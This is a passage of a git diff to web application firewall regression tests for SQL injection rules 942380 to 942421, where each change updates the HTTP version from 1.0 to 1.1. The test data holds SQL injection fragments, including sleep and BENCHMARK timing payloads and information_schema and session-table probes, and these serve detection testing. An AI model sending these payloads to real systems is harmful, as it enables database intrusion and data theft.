           data: "from%28select%28sleep%2820%29%29%29a%29%2B%27%26data%5BJob%5D%5Blimit"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942380]
@@ -475,7 +475,7 @@ tests:
           port: 80
           uri: "/post"
           data: "from%28select%28sleep%2820%29%29%29a%29--+%26data%5BJob%5D%5Blimit"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942380]
@@ -492,7 +492,7 @@ tests:
           port: 80
           uri: "/post"
           data: "from%28select%28sleep%2820%29%29%29a%29%26data%5BJob%5D%5Blimit"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942380]
@@ -509,7 +509,7 @@ tests:
           port: 80
           uri: "/post"
           data: "FROM+ack_variable+WHERE+name%3D%22cron_last%22%3B%26sql_delimit"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942380]
@@ -526,7 +526,7 @@ tests:
           port: 80
           uri: "/post"
           data: "execute node_"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942380]
@@ -543,7 +543,7 @@ tests:
           port: 80
           uri: "/post"
           data: "execute scald"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942380]
@@ -560,7 +560,7 @@ tests:
           port: 80
           uri: "/post"
           data: "execute system"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942380]
@@ -577,7 +577,7 @@ tests:
           port: 80
           uri: "/post"
           data: "execute user_"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942380]
@@ -594,7 +594,7 @@ tests:
           port: 80
           uri: "/post"
           data: "execute views"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942380]
@@ -611,7 +611,7 @@ tests:
           port: 80
           uri: "/post"
           data: "execute patha"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942380]
@@ -628,7 +628,7 @@ tests:
           port: 80
           uri: "/post"
           data: "execute workb"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942380]
@@ -645,7 +645,7 @@ tests:
           port: 80
           uri: "/post"
           data: "execute panel"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942380]
@@ -662,7 +662,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=from+information_schema.tables+where+1%3D2+limit"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942380]
@@ -679,7 +679,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=FROM%2B%2560oxattribute%2560%2BWHERE%2BCONVERT%2528%2560oxattribute%2560.%2560OXID%2560%2BUSING%2Butf8%2529%2B%253D%2B%2527n550a1cee455b9ce585343d75d112b77%2527%2BLIMIT"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942380]
@@ -696,7 +696,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=FROM%28select+count%28%2A%29%2Cconcat%28%28select+%28select+concat%28session_id%29%29+FROM+jml_session+LIMIT"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942380]
@@ -713,7 +713,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=SELECT+dDJq+WHERE+9896%3D9896%3BSELECT+%28CASE"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942380]
@@ -730,7 +730,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=FROM+%60we_tblErrorLog%60+WHERE+%60we_tblErrorLog%60.%60ID%60+%3D+25251+LIMIT"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942380]
@@ -747,7 +747,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=FROM+%60dates%60+order+by+%60uname%60%2C+%60date%60%2C+%60load%60%26dummy%3D%60uname%60%26dummy%3D%60datum%60%26dummy%3D%60laden%60%26sql_delimit"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942380]
@@ -764,7 +764,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=IF%20EXISTS%20(SELECT%20*%20FROM%20users%20WHERE%20username%20%3D%20'root')%20BENCHMARK(1000000000%2CMD5(1))"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942380]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml
index 05ce6b989..d9e615643 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942390.yaml
@@ -15,7 +15,7 @@ tests:
           method: GET
           port: 80
           uri: "/get?var=sdfsd%27or%201%20%3e%201"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942390]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml
index 2de63c416..f7fce2945 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942400.yaml
@@ -17,7 +17,7 @@ tests:
           uri: "/post"
           # variable name boundary attacks
           data: "and '5'orig_var_datavarname=whatever"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942400]
@@ -35,7 +35,7 @@ tests:
           uri: "/post"
           # variable name boundary attacks
           data: "and 7 oranges"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             no_expect_ids: [942400]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml
index a3ee7e847..bd4d64ded 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942410.yaml
@@ -16,7 +16,7 @@ tests:
           port: 80
           uri: "/post"
           data: "ABS("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -33,7 +33,7 @@ tests:
           port: 80
           uri: "/post"
           data: "benchmark("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -50,7 +50,7 @@ tests:
           port: 80
           uri: "/post"
           data: "BENChmARk("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -67,7 +67,7 @@ tests:
           port: 80
           uri: "/post"
           data: "cast("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -84,7 +84,7 @@ tests:
           port: 80
           uri: "/post"
           data: "CAST("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -101,7 +101,7 @@ tests:
           port: 80
           uri: "/post"
           data: "char("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -118,7 +118,7 @@ tests:
           port: 80
           uri: "/post"
           data: "chaR("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -135,7 +135,7 @@ tests:
           port: 80
           uri: "/post"
           data: "chr("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -152,7 +152,7 @@ tests:
           port: 80
           uri: "/post"
           data: "CHR("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -169,7 +169,7 @@ tests:
           port: 80
           uri: "/post"
           data: "COALESCE("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -186,7 +186,7 @@ tests:
           port: 80
           uri: "/post"
           data: "Compress ("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -203,7 +203,7 @@ tests:
           port: 80
           uri: "/post"
           data: "concat ("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -220,7 +220,7 @@ tests:
           port: 80
           uri: "/post"
           data: "cOnCaT("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -237,7 +237,7 @@ tests:
           port: 80
           uri: "/post"
           data: "concat_ws("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -254,7 +254,7 @@ tests:
           port: 80
           uri: "/post"
           data: "convert("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -271,7 +271,7 @@ tests:
           port: 80
           uri: "/post"
           data: "cOnVeRt("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -288,7 +288,7 @@ tests:
           port: 80
           uri: "/post"
           data: "COS("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -305,7 +305,7 @@ tests:
           port: 80
           uri: "/post"
           data: "COUNT("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -322,7 +322,7 @@ tests:
           port: 80
           uri: "/post"
           data: "CURRENT_USER("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -339,7 +339,7 @@ tests:
           port: 80
           uri: "/post"
           data: "database ("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -356,7 +356,7 @@ tests:
           port: 80
           uri: "/post"
           data: "date("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -373,7 +373,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=date%5D%3D%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -390,7 +390,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=day.+%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -407,7 +407,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=day%26%27%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -424,7 +424,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=decode%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -441,7 +441,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=default%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -458,7 +458,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=ELT%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -475,7 +475,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=encode%3D%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -492,7 +492,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=ExtractValue%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -509,7 +509,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=EXTRACTVALUE%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -526,7 +526,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=floor%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -543,7 +543,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=FLOOR+%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -560,7 +560,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=format%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -577,7 +577,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=GROUP_CONCAT%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -594,7 +594,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=hex%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -611,7 +611,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=hEx%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -628,7 +628,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=if+%21%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -645,7 +645,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=if+%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -662,7 +662,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=if%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -679,7 +679,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=if%5C%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -696,7 +696,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=IFNULL%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -713,7 +713,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=in+%27%24%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -730,7 +730,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=IN+%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -747,7 +747,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=IN%2F%2A%2A%2F%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -764,7 +764,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=insert%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -781,7 +781,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=left%27%29%3F%24%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -798,7 +798,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=LEFT%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -815,7 +815,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=length%7C%7C%21%21%24%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -832,7 +832,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=length%7C%7C%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -849,7 +849,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=length%3F%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -866,7 +866,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=length%26%26%21%21%21%24%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -883,7 +883,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=length%26%26%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -900,7 +900,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=LENGTH%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -917,7 +917,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=ln+%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -934,7 +934,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=ln%29+%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -951,7 +951,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=load_file%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -968,7 +968,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=local%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -985,7 +985,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=log%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1002,7 +1002,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=log%26%26%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1019,7 +1019,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=lower%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1036,7 +1036,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=MAKE_SET%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1053,7 +1053,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=MAX%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1070,7 +1070,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=md5%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1087,7 +1087,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=md5%5C%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1104,7 +1104,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=MID%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1121,7 +1121,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=minute+%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1138,7 +1138,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=month%3D%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1155,7 +1155,7 @@ tests:
           port: 80
           uri: "/post"
           data: "name_const("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1172,7 +1172,7 @@ tests:
           port: 80
           uri: "/post"
           data: "now("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1189,7 +1189,7 @@ tests:
           port: 80
           uri: "/post"
           data: "nOW("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1206,7 +1206,7 @@ tests:
           port: 80
           uri: "/post"
           data: "ord("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1223,7 +1223,7 @@ tests:
           port: 80
           uri: "/post"
           data: "password?("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1240,7 +1240,7 @@ tests:
           port: 80
           uri: "/post"
           data: "password/?("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1257,7 +1257,7 @@ tests:
           port: 80
           uri: "/post"
           data: "Password>$("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1274,7 +1274,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pg_sleep("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1291,7 +1291,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pi("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1308,7 +1308,7 @@ tests:
           port: 80
           uri: "/post"
           data: "PI("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1325,7 +1325,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pow("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1342,7 +1342,7 @@ tests:
           port: 80
           uri: "/post"
           data: "POW("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1359,7 +1359,7 @@ tests:
           port: 80
           uri: "/post"
           data: "quarter. ("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1376,7 +1376,7 @@ tests:
           port: 80
           uri: "/post"
           data: "rand("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1393,7 +1393,7 @@ tests:
           port: 80
           uri: "/post"
           data: "Rand ("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1410,7 +1410,7 @@ tests:
           port: 80
           uri: "/post"
           data: "RAND("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1427,7 +1427,7 @@ tests:
           port: 80
           uri: "/post"
           data: "replace("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1444,7 +1444,7 @@ tests:
           port: 80
           uri: "/post"
           data: "REPLACE("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1461,7 +1461,7 @@ tests:
           port: 80
           uri: "/post"
           data: "round ("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1478,7 +1478,7 @@ tests:
           port: 80
           uri: "/post"
           data: "round("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1495,7 +1495,7 @@ tests:
           port: 80
           uri: "/post"
           data: "rtrim("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1512,7 +1512,7 @@ tests:
           port: 80
           uri: "/post"
           data: "RTRIM("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1529,7 +1529,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=sin ("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1546,7 +1546,7 @@ tests:
           port: 80
           uri: "/post"
           data: "SIN("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1563,7 +1563,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=sleep("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1580,7 +1580,7 @@ tests:
           port: 80
           uri: "/post"
           data: "SLEEP   ("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1597,7 +1597,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=strcmp("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1614,7 +1614,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=substr("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1631,7 +1631,7 @@ tests:
           port: 80
           uri: "/post"
           data: "SUBSTR("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1648,7 +1648,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=substring("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1665,7 +1665,7 @@ tests:
           port: 80
           uri: "/post"
           data: "SUBSTRING("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1682,7 +1682,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=sysdate("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1699,7 +1699,7 @@ tests:
           port: 80
           uri: "/post"
           data: "time ("
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1716,7 +1716,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=time%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1733,7 +1733,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=trim%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1750,7 +1750,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=Uncompress+%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1767,7 +1767,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=unhex%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1784,7 +1784,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=uNhEx%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1801,7 +1801,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=updatexml%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1818,7 +1818,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=UpdateXML%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1835,7 +1835,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=UPPER%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1852,7 +1852,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=user+%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1869,7 +1869,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=user%2F%3F%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1886,7 +1886,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=user%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1903,7 +1903,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=values+%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1920,7 +1920,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=VALUES%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1937,7 +1937,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=version%3D%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1954,7 +1954,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=version%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1971,7 +1971,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=xmltype%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -1988,7 +1988,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=XMLType%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
@@ -2005,7 +2005,7 @@ tests:
           port: 80
           uri: "/post"
           data: "pay=year%5D%3D%28"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942410]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml
index b0d3ee0e6..92940a8a8 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml
@@ -16,7 +16,7 @@ tests:
           method: POST
           port: 80
           uri: "/post"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942420]
diff --git a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml
index 4b71697ff..db7114909 100644
--- a/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml
+++ b/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml
@@ -16,7 +16,7 @@ tests:
           method: GET
           port: 80
           uri: "/get"
-          version: HTTP/1.0
+          version: HTTP/1.1
         output:
           log:
             expect_ids: [942421]
